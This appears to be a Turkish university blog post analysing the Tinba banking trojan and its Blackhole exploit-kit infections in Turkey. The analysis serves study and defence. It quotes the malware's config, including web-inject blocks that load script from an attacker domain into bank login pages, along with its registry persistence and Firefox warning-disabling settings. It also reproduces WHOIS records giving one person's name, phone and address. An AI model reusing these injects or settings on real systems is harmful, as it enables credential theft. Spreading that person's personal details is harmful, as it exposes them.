Mustafa Kemal Üniversitesi Bilgisayar Mühendisliği Bölümü Ders Materyal Ve Notları

Sponsor

14 Temmuz 2014 Pazartesi

Tinba Virüsü - Türkiye

Posted by samgar at 12:17 0 Comments
Yaklaşık 20 kb boyutunda olan ünlü Blackhole suç yazılımlarından, Tinba, Türkiye’de 600.000 den fazla kullanıcıyı etkilemiştir. İsim olarak Tinba kelimesi “tiny” ve “bank.” sözcüklerinden gelmektedir ve Tinybanker” ve “Zusy” kötü niyetli yazılımı olarak bilinmektedir.

Micro Trend Güvenlik Grubu, bu trojenin 4 aylık bir takip neticesinde Türkiye’ye odaklandığını keşfetmiştir. Aşağıdaki resim etkilenen bölgeleri göstermektedir.



Araştırmalar değişken/farklı IP ler esas alınarak tespit edilmiştir.


Saldırganlar, yetkisiz bankacılık işlemlerinde potansiyel büyük kayıplar oluşturarak Türkiye içersinde özellikle mali kurumları (bankalar, şirketler) hedef almaktadır.




Blackhole Exploiti

Uzun takipler sonucunda Tinba çetesinin, enfeksiyon sayısı giderek artmaktadır. İşin ilginç tarafı ise bu virüsü kapmış kullanıcıların Blackhole exploit kitini kullanıyor olmaları. Örneğin aşağıdaki gibi :

hxxp://sondder.ws/data/ap2.php
--> hxxp://sondder.ws/main.php?page=1a38e197e2c1e8a2
    -->hxxp://sondder.ws/w.php?f=182b5&e=1
(Tinba MD5: b6991e7497a31fada9877907c63a5888)


host’a ulaşıldığında Blackhole, kurbanın “Please wait page is loading..., iletisini almasını bekler. Bir çok siber suçlu Blackhole Exploit kit lerini bilgisayarlara enfeksiyon bulaştırmak ve otomatik olarak Botnete dahil etmek için kullanır.

Not: http:// dizesi kasıtlı olarak hxxp:// olarak değişir.

Tinba’ya Genel Bakış


Tinba Trojan-banker olarak bilinen küçük bir dosyadır. Net trafiğinizi sniff ederek login bilgilerinizi ele geçirir ve tarayıcınıza yerleşir. Diğer bankerTrojanler gibi Man in the Browser (MiTB) yöntemini kullanır ve belirli web sayfalarının görünümünü değiştirerek enjeksiyon yapar.

Amaç: 2 faktörlü kimlik doğrulamayı aşmak ve kredi kartı bilgileri gibi hassas verilere sahip etkilenmiş kullanıcıları kandırmak.

Tinba, CSIS’in bugüne kadar karşılaştığı en küçük Trojan-banker olup, zararlı yazılımlar gruba girmektedir. 20 KB boyutundaki bu kod oldukça basit olup gelişmiş şifrelemeye sahip değildir. Tespit edilen örnekler, antivirüs sistemlerinin tesipitinin düşük olduğunu göstermektedir.

Virüs çalıştırıldığında; antivirüslere yakalanmamak için gizlenebilen bir enjeksiyon başlatır. Bu enjeksiyon işlemi saklandığı yerde yeni bir bellek alanı oluşturmakta ve bu işlem “winver.exe” (Version Reporter Applet)’e enjekte edilmektedir. Sonuş olarak Windows Sistem Klasöründe geçerli bir dosya halini alır. Bunun yanında aynı zamanda"explorer.exe" ve "svchost.exe" dosyalarına da enjeksiyon yapmaktadır.

Virüs çalışma esnasında 4 farklı kütüphane kullanmaktadır : ntdll.dll, advapi32.dl, ws2_32.dll, ve user32.dll. Ana bileşenler [%ALLUSERSPROFILE%]\\Application Data\\default directory’e kopayalanır. Bunlar bin.exe, cfg.dat, web.dat dosyalarından oluşmaktadır. bin.exe dosyası kayıt defterine run key olarak eklenir ve böylelikle sistem kapatıldığında/açıldığında kodlar çalışmaya başlar.

Bu enjeksiyonlar winver.exe ye dahil edilir. Bu dosya system32 dizininde bulunmaktadır. Öncelikle bu kötü niyetli yazılım hali hazır çalışan explorer.exe’e enjekte edilir ya da svchost.exe’nin yeni bir kopyasını başlatır. Bu işlemler kötü niyetli yazılımları kullanıcılar için daha az şüpheli yapanlardan daha farklı bir yol izlemektedir. Bu sayede Virüs uzaktan bağlanma kapsamına girer ve etkilenmiş belleğe kısa bir sapma (geçici yol) yaparak orjinal giriş noktası üzerine yazar. Dosya görüntüsünün kalanı değiştirilmeden kalır.





Virüs çalıştırıldığında ntdll.dll, advapi32.dll, ws2_32.dll, and user32.dll kütüphanlerini kullanmakta olduğunu yukarda belirtmiştik. Sistem açılıp kapatıldığında kayıt defterine aşağıdaki gibi bir anahatar eklemektedir.

HKCU\\ Software\\Microsoft\\Windows\\CurrentVersion\\Run with the name
“default.”

Virüs çalıştırılabilir dosyanın geçerli yolunu kontrol etmektedir. %ALLUSERSPROFILE%\\Application Data\\default\\bin.exe yolundan farklı ise, kayıt defteri anahtarı oluşturmadan önce bu dizine kendini kopyalar.



Firefox’da Uyarı Sayfasınaı Devre dışı Bırakma

Tinba, Firefox potansiyel zararlı web sayfalarını ziyaret ettiğinizde uyarı sayfasını devredışı bırakmaktadır. Mozilla bu sayfayı “Firefox 3 or later contains built-in phishing and malware protection to help keep you safe online.
These features will warn you when a page you visit has been reported as a Web forgery of a legitimate site (sometimes called “phishing” pages) or as an attack site designed to harm your computer (otherwise known as malware).” olarak tanımlamaktadır. Çünkü virüs bu uyarı kapatmaktadır.

Mozilla, İçeriği %SystemDrive%\\Documents and Settings\\All Users\\Application Data\\Mozilla\\Firefox\\Profiles\\[USER PROFILE NAME]\\user.js içeriğinin user_pref("security.warn_submit_insecure",false);user_pref("security.warn_viewing
_mixed",false).” olarak değiştirildiği Firefox kurulum klasöründe arama yaparak gerçekleştirir.


Bağlantıları

Tinba, kendi bağlantılarını korumak için RC4 şifreleme algoritmasını kullanmaktadır. Bugüne kadar CSIS ve Trend Micro default_password ve wer8c7ygbw485ghw gibi 4 ten fazla birbirinden farklı şifreyi tanımlamıştır.

Tinba Hedefleri

Tinba’nın gömülü bir varsayılan yapılandırması mevcuttur.

[urlfilter]
https://* P
!*microsoft.* GP
!*google.* GP
*accounts.google.*/ServiceLoginAuth* P
!*facebook.* GP
*facebook.*/login.php* P
!*onlinechat.gmx.* GP
*service.gmx.*/cgi/login* P
[end]

Bu varsayılan yapılandırma Google, Facebook, Microsoft, ve GMX gibi çevrim içi hizmetlerde login bilgilerini çalmak için virüse talimat vermektedir. Bunun yanında tüm HTTPS loglarını kaydetmektedir. Bunlara ilave olarak ek domain lerde yapılandırmada tanımlanmıştır:

set_url https://kunde.comdirect.de* GP
data_before
<bOdy
data_end
data_inject
style="visibility:hidden"
data_end
data_after
data_end
data_before
data_end
data_inject
https://lorenzoonavio.com/trade/comcort
data_end
data_after
/ccf/modules/js/cp_core.module.js
data_end
data_before
</bOdy>
data_end
data_inject
<script type="text/javascript"
src= "https://lorenzoonavio.com/trade/comcort/script.js"></script>
data_end
data_after
</html>
data_end
set_url https://banking.dkb.de/dkb/* PG
data_before
</bOdy>
data_end
data_inject
<script src= "https://lorenzoonavio.com/trade/dakort/script.js"> </script>
data_end
data_after
</html>
data_end
data_before
<bOdy
data_end
data_inject
style="visibility:hidden"
data_end
data_after
data_end
data_before
<script type="text/javascript">Form_hookup(’login’);</script>
data_end
data_inject
</form>
<script type="text/javascript">
data_end
data_after
function refreshAnimation()
data_end
data_before
} );
data_end
data_inject
data_end
data_after
</script>
data_end

Bunların yanında aşağıdaki domainler de en çok hedef alanlar arasında yer almaktadır.

63146 https://medeczane.sgk.gov.tr
26954 https://www.facebook.com
21708 https://fb-client.family.zynga.com
18754 https://fv-zprod.farmville.com
13641 https://isube.garanti.com.tr
10431 https://login.live.com
7486 https://oss-content.securestudies.com
6741 https://www.castrolfilozof.com
6326 https://www.e-icisleri.gov.tr
6322 https://www.isbank.com.tr
6270 https://www-bpt2.wiiings.com
6175 https://etopup.vodafone.com.tr
5147 https://cafeland.gamegos.net
4432 https://acikdeniz.denizbank.com
4057 https://medeczane2.sgk.gov.tr
3598 https://bar-navig.yandex.ru
3506 https://maps.googleapis.com
3244 https://pharmcash.com
3235 https://internetsube.turkiyefinans.com.tr
3093 https://baymsg1010727.gateway.messenger.live.com
2943 https://twitter.com
2800 https://esube1.ziraatbank.com.tr
2798 https://fb.bubble.zynga.com
2588 https://acente.flypgs.com
2494 https://mebbis.meb.gov.tr

En çok skor, kamu hizmetleriyle yapılan bağlantılarda Türkiye’deni girişlerdir. Bununla birlikte Türkiye dışından yapılan girişlere izin verilmemektedir.



CSIS ve Trend Micro bu siber suçlulara yönelik tespit ettikleri bir domaine (monolitabuse.com) Whois de incelediklerinde :

Registrant Contact:
Irina Uchaykina admin@monolitabuse.com
+74959284906 fax: +74959284906
Ul. Ryazanskiy Prospekt, dom 27, kv. 89
Moscow Moscovskaya oblast 103928
ru


Yukarıdaki kayda ulaşmaktadırlar. Whois veritabanında Irina Uchaykina’nın minimum 34 kayıtlı domaini olduğunu belirlemişlerdir.

areuirbgeuihrweiufhey.com
kipolkas3253.net
sabmadelon.com
unendingnight.com
bertoilsdf243.com
memory3.org
saintrobots.com
univerce-hosting.com
coolmoroco.com
mitworkidekwimm.net
serf654.com
ureuirbgeuihrweiufhey.com
dakotawersvoipas.com
monolitabuse.com
sevenltddrivers.net
vfr4455.com
dshfauhi8izykdnkzx.com
networkingoutmix.net
sitelogodesign.com
wwreuirbgeuihrweiufhey.com
fertipeoteovereoner.com
newdomaino.com
statisticlub.net
xartcollect.com
hosto-master.com
nologo0094.net
teerg.com
zvnurhidkfijfkdfkddfdsdsgyh.com
ilbrnd.com nologo1093.com
tegusigalpanebil.com
unendingnight.com
ioewjhfdhduiusfh.com
reezz.com tyui89.com
univerce-hosting.com

Bu Yayını Paylaş

Takipçi Ol

Mail adresinizi kaydedelim ilk sizin haberiniz olsun.

0 yorum:

Sponsor

Yazılarım Korunuyor

Yandex Metrica

Yandex.Metrica

Toplam Sayfa Görüntüleme Sayısı

back to top